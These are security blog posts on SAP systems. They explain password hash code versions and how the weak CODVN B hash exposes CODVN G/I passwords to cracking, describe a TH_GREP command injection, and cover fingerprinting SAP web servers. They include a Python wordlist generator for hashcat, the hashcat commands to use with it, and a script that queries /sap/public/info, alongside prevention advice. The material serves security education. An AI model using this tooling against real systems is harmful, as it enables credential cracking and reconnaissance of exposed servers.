Monday, August 31, 2015

Understanding SAP password hashing Mechanism and Cracking



What is this Code Version thing?
SAP stores the password hashes of all users in table USR02; the tables USH02 and USRPWDHISTORY hold the history of changed passwords. ABAP systems do not store passwords in plain text; instead they compute a hash value and store that in the database, so that someone with direct read access to the tables cannot simply read the passwords (they do get the hashes, which is what the attack described below works on).

Over time, to improve security (and performance), SAP has introduced several password hashing mechanisms. Each one is identified by a Code Version, stored in the field CODVN. The most recent code version is "I"; the full list is:

CODVN  Description
-----  -------------------------------------------------------------------
A      Obsolete
B      Based on MD5, 8 characters, uppercase, ASCII
C      Not implemented
D      Based on MD5, 8 characters, uppercase, UTF-8
E      Reserved
F      Based on SHA1, 40 characters, case-sensitive, UTF-8
G      Code Version B + Code Version F (2 hashes)
H      Based on SHA1, random salt, 40 characters, case-sensitive, UTF-8
I      Code Version B + Code Version F + Code Version H (3 hashes)

In tables USR02 and USH02 the hashes are stored in different fields, depending on the CODVN:
-----------------------------------------
CODVN B hashes - BCODE field
CODVN F hashes - PASSCODE field
CODVN G stores both hashes: CODVN B in BCODE and CODVN F in PASSCODE
CODVN H hashes - PWDSALTEDHASH field
CODVN I stores all three: BCODE, PASSCODE and PWDSALTEDHASH


How does this cracking work?
As of SAP NetWeaver 7.0 the system supports a new hashing mechanism (CODVN F) for passwords of up to 40 characters that are case-sensitive and may contain any Unicode character. Older releases only supported passwords of up to eight characters, and the system itself converted them to uppercase before hashing (CODVN B, D).

Unfortunately, these improvements are not backward compatible: hash values produced by the new mechanism and stored in USR02 and USH02 cannot be verified by older SAP releases or by connected systems that only understand the old format.

If an SAP system works together with other SAP systems that only support the backward compatible hash values, the profile parameter login/password_downwards_compatibility has to be activated. With downward compatibility the system generates all possible hash values for each password (that is, the old CODVN B hash in addition to the new one) and uses them where required when accessing other SAP systems. This is exactly what makes code versions G and I attackable: the weak 8-character uppercase hash is stored right next to the strong one.

In general it should not be possible to recover the plain text password from a hash value. But well-known password cracking tools such as hashcat and John the Ripper ship with modules for two of the SAP hash algorithms: CODVN B (hashcat mode 7700) and CODVN F/G (hashcat mode 7800). In both modes the hash is supplied as USERNAME$HASH, because the username is the salt.

Let us say the SAP system uses CODVN G, the combination of CODVN B and CODVN F. CODVN B hashes only the first eight characters of the password, converted to uppercase, and is salted with nothing but the username, so the BCODE is cheap to crack and tells us the first eight characters of the password (in uppercase only; the original case is lost). From that we build a dictionary for CODVN F: every upper/lower case variant of the recovered eight characters, followed by every possible continuation, and run it against the PASSCODE. The search space for the strong hash shrinks from the full password to the case of eight known characters plus the remaining (typically few) characters.
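The second stage of that attack, as an added example (this is not code from the original post): given the eight uppercase characters recovered from the BCODE, generate the dictionary of case variants and continuations to run against the PASSCODE. The recovered prefix, alphabet and suffix length used in main() are constructed for illustration; the hashcat modes mentioned in the comments are 7700 (CODVN B) and 7800 (CODVN F/G).

```python
# Added example, not code from the original post: build the stage-two
# dictionary for the CODVN G attack.  Stage one (cracking the CODVN B hash
# in BCODE, e.g. hashcat -m 7700) yields the first eight characters of the
# password in UPPER CASE only, because CODVN B upper-cases and truncates the
# password before hashing.  Stage two must therefore try every case variant
# of that prefix combined with every possible continuation against the
# case-sensitive CODVN F hash in PASSCODE (e.g. hashcat -m 7800 -a 0 with
# the generated list).  Prefix, alphabet and suffix length are caller
# choices; the values in main() are constructed for illustration.
import itertools
import string
from typing import Iterator

ALNUM = string.ascii_letters + string.digits  # 62-character suffix alphabet


def case_variants(prefix: str) -> Iterator[str]:
    """Yield every upper/lower case spelling of prefix.  Letters have two
    forms; digits and specials have one, so they do not multiply the count."""
    forms = [(c.upper(), c.lower()) if c.isalpha() else (c,) for c in prefix]
    for combo in itertools.product(*forms):
        yield "".join(combo)


def candidates(prefix: str, alphabet: str, max_suffix: int) -> Iterator[str]:
    """Yield prefix variants followed by 0..max_suffix characters from alphabet.
    max_suffix = 0 covers passwords of at most eight characters, where the
    BCODE already contains the whole password and only the case is unknown."""
    for p in case_variants(prefix):
        for n in range(max_suffix + 1):
            for tail in itertools.product(alphabet, repeat=n):
                yield p + "".join(tail)


def keyspace(prefix: str, alphabet: str, max_suffix: int) -> int:
    """Number of candidates candidates() will produce, without generating them."""
    letters = sum(1 for c in prefix if c.isalpha())
    tails = sum(len(alphabet) ** n for n in range(max_suffix + 1))
    return 2 ** letters * tails


def blind_keyspace(alphabet: str, length: int) -> int:
    """Size of a plain brute force of `length` characters, for comparison."""
    return len(alphabet) ** length


def write_wordlist(path: str, prefix: str, alphabet: str, max_suffix: int) -> int:
    """Write the candidates to a file usable with hashcat -a 0; returns the count."""
    n = 0
    with open(path, "w", encoding="utf-8") as fh:
        for word in candidates(prefix, alphabet, max_suffix):
            fh.write(word + "\n")
            n += 1
    return n


if __name__ == "__main__":
    recovered = "SECRET12"  # constructed: what cracking the BCODE returned
    print("blind 10-char search:", blind_keyspace(ALNUM, 10))
    print("with known prefix   :", keyspace(recovered, ALNUM, 2))
    print(write_wordlist("stage2.txt", recovered, ALNUM, 2), "candidates written")
```

With the 62-character alphabet and up to two unknown trailing characters the list has 250,048 entries for a prefix containing six letters, against 62^10 (about 8.4 x 10^17) for a blind search of a ten-character password. Feed the file to hashcat -m 7800 -a 0 together with the USERNAME$PASSCODE hash.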


Prevention:
  • Protect access to the hash values in tables USR02, USH02 and USRPWDHISTORY.
  • Use the most recent password hashing algorithm (CODVN H, iterated salted SHA-1), see parameter login/password_hash_algorithm.
  • Set parameter login/password_downwards_compatibility = 0 so that no CODVN B hash is generated any more (this might break communication with systems older than 7.0, check carefully).
  • Delete the old hashes that are already stored, see ABAP report CLEANUP_PASSWORD_HASH_VALUES (changing the parameter alone does not remove existing BCODE values).
  • Restrict direct access to the SAP database, both via transaction DBACOCKPIT (SQL prompt) and at OS level.
  • Choose strong passwords and enforce them via the password policy parameters:
      login/min_password_lng
      login/min_password_letters
      login/min_password_digits
      login/min_password_lowercase
      login/min_password_uppercase
      login/min_password_specials
      login/password_max_idle_productive
      login/password_max_idle_initial
      login/password_history_size
      login/password_expiration_time



Reference:
SAP Note 1237762 - ABAP systems: Protection against password hash attacks
SAP Note 1458262 - ABAP: recommended settings for password hash algorithms
SAP Note 862989 - New password rules as of SAP NetWeaver 2004s (NW ABAP 7.0)
http://www.daniel-berlin.de/





Wednesday, August 26, 2015

SAP NetWeaver code injection via TH_GREP Functional Module



TH_GREP is a function module used by several SAP programs to search for a string in files on the application server; as the name suggests, it does so by calling the operating system's grep utility. The function module contains vulnerable code through which a crafted search string reaches the operating system and is executed there, so anyone who can call TH_GREP can run arbitrary OS commands on the application server host under the operating system user of the SAP instance. That is enough to take control of the SAP system and escalate privileges far beyond the caller's SAP authorisations.


The vulnerable code can be reached in several ways:
  • Locally, by executing function module TH_GREP in transaction SE37 (Function Builder)
  • From the transaction SM51 screen, whose string search uses the same grep utility on the backend and can be misused to trigger the vulnerable code
  • Remotely, through an RFC call to TH_GREP
  • Remotely, through a SOAP RFC call to TH_GREP via the web interface


Reference:
http://erpscan.com/

Prevention:
  • Restrict access to critical transactions (SM51, SE37) and to RFC function modules (authorisation object S_RFC).
  • Implement SAP Notes 1580017 and 1433101.



Saturday, August 15, 2015

SAP Web Attacks and Countermeasures


This article focuses on:

  • Different SAP web Application Servers
  • Fingerprint SAP web applications
  • Countermeasures

Different SAP web Application Servers:

Internet Transaction Server (ITS)
  • SAP introduced ITS (Internet Transaction Server) as its first approach to making SAP systems accessible from the Internet. ITS acts as middleware that translates SAP Dynpros (dynamic programs, the classic SAP GUI screens) into HTML pages. As of Web Application Server 6.40, ITS is integrated into the application server.
  • ITS consists of two major components: the WGate (Web gateway), an extension of the Web server that receives the browser requests, and the AGate (application gateway), which takes the requests from the WGate and links the ITS to the SAP system by communicating with the application server over the DIAG or RFC protocol.

URL syntax to access ITS web service:
http://<server>:<port>/<path_to_wgate>/<service_name>/!?<optional_params>


Internet Communication Manager (ICM)
  • ICM (Internet Communication Manager) handles the communication between the SAP Web Application Server and the outside world over HTTP, HTTPS and SMTP.
  • ICM is a component of SAP NetWeaver Application Server. Incoming web requests are dispatched by the ICF (Internet Communication Framework), which selects the service to run based on the URL (services are maintained in transaction SICF); after installation most ICF services are inactive. The following profile parameters configure the ICM for HTTP, HTTPS and SMTP:
# Definition of the ports 
icm/server_port_0 = PROT=HTTP, PORT=1080 
icm/server_port_1 = PROT=HTTPS, PORT=1443 
icm/server_port_2 = PROT=SMTP, PORT=1025  

# Parameters for SSL support 
sec/libsapsecu = $(DIR_EXECUTABLE)/libsapcrypto.so 
ssl/ssl_lib = $(DIR_EXECUTABLE)/libsapcrypto.so 

# Parameter for ICM Security Log [Parameters MAXSIZEKB=<max size in KB>, SWITCHTF=<options>, FILEWRAP=on]
icm/security_log = LOGFILE=<file name>, LEVEL=<security level>

# Parameter for ICM logging [Parameters LOGFORMAT=<format>, FILTER=<filter>, MAXSIZEKB=<size in kbytes>, SWITCHTF=<options>, FILEWRAP=on]
icm/HTTP/logging_00 =  PREFIX=<URL prefix>, LOGFILE=<log file name>  


SAP Enterprise Portal (EP)

  • The Portal provides a single point of access to the organization's SAP and non-SAP information sources, enterprise applications, databases and services via a web-based interface.
  • It is a complex Java application running on the J2EE engine (SAP NetWeaver AS Java), providing role-based access to enterprise information and applications.

Enterprise Portal ports
HTTP  5xx00
HTTPS 5xx01
where xx is the Java instance number (JCxx).


Fingerprint SAP web applications

  • It is common for SAP applications to be reachable from the Internet, which makes it easy for anonymous users to find and fingerprint SAP systems. A simple means of finding SAP systems connected to the Internet is a search engine such as Google or Shodan.
  • Once an attacker has identified an SAP system on the web, version information about the SAP components (ITS, ICM, J2EE Engine/EP) can be gathered easily by sending simple HTTP requests to the SAP web server, whose responses (the HTTP Server header, error pages) hand that information straight back to the attacker.
  • Enterprise Portal error messages reveal the installed portal version (in this case, Enterprise Portal 7.00).
  • ICM error messages reveal SAP system information such as the server hostname (here sapides), the system ID (IDS) and the instance number (00).

  • There are more than 1500 standard ICF services in SAP ECC, each giving access to some application function or data. In some installations a few of these services are active by default, which can lead to sensitive information disclosure.
  • The ICF service /sap/public/info, for instance, can be called without logging on and returns the SAP system ID, hostname, database type, SAP release, patch level, SAP kernel version, OS type, etc.



ICF services are of two types, public and private. Public services can be executed directly, without authentication; private services require an initial logon, after which the user can execute the service only if the ICF authorisation objects assigned to the user allow it.
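As an added example (not part of the original post), a small parser for what /sap/public/info returns. The sample reply is constructed for this example, using the lab values from above (host sapides, SID IDS); the element names follow the RFCSI structure of RFC_SYSTEM_INFO, which is my assumption about the service's format rather than something the post states. Only fetch() touches the network, and it is not needed to run the offline parts.

```python
# Added example, not from the original post: parse the XML that the public
# ICF service /sap/public/info returns and extract the fingerprinting fields
# listed above.  SAMPLE_RESPONSE is CONSTRUCTED for this example; the element
# names follow the RFCSI structure exported by RFC_SYSTEM_INFO, which the
# service is assumed to wrap (verify against a real reply).
import sys
import xml.etree.ElementTree as ET
from urllib.request import urlopen

SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
 <SOAP-ENV:Body>
  <rfc:RFC_SYSTEM_INFO.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
   <RFCSI_EXPORT>
    <RFCPROTO>011</RFCPROTO>
    <RFCHOST>sapides</RFCHOST>
    <RFCSYSID>IDS</RFCSYSID>
    <RFCDATABS>IDS</RFCDATABS>
    <RFCDBHOST>sapides</RFCDBHOST>
    <RFCDBSYS>ORACLE</RFCDBSYS>
    <RFCSAPRL>700</RFCSAPRL>
    <RFCMACH>  390</RFCMACH>
    <RFCOPSYS>Linux</RFCOPSYS>
    <RFCIPADDR>192.168.56.10</RFCIPADDR>
    <RFCKERNRL>720</RFCKERNRL>
   </RFCSI_EXPORT>
  </rfc:RFC_SYSTEM_INFO.Response>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""

# RFCSI fields worth extracting and what each tells an attacker.
FIELDS = {
    "RFCSYSID": "SAP system ID",
    "RFCHOST": "application server hostname",
    "RFCDBHOST": "database hostname",
    "RFCDBSYS": "database type",
    "RFCSAPRL": "SAP release",
    "RFCKERNRL": "kernel release",
    "RFCOPSYS": "operating system",
    "RFCIPADDR": "server IP address",
}


def parse_system_info(xml_bytes: bytes) -> dict:
    """Return {field: value} for every known RFCSI field found in the reply.
    Tags are matched on their local name, so namespace prefixes do not matter."""
    root = ET.fromstring(xml_bytes)
    info = {}
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1]
        if local in FIELDS:
            info[local] = (elem.text or "").strip()
    return info


def report(info: dict) -> list:
    """Human-readable lines, one per disclosed (non-empty) field."""
    return [f"{FIELDS[k]}: {v}" for k, v in info.items() if v]


def fetch(base_url: str, timeout: float = 10.0) -> bytes:
    """Retrieve /sap/public/info from an ICM, e.g. base_url = http://host:8000.
    No logon is needed while the service is active, which is the whole point."""
    return urlopen(base_url.rstrip("/") + "/sap/public/info", timeout=timeout).read()


if __name__ == "__main__":
    raw = fetch(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESPONSE
    print("\n".join(report(parse_system_info(raw))))
```

Run it without arguments to see the constructed sample parsed; with a base URL it queries the real service. An empty or error result from a target is itself a finding: the service has been deactivated in SICF, which is the fix for this disclosure.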




Reference: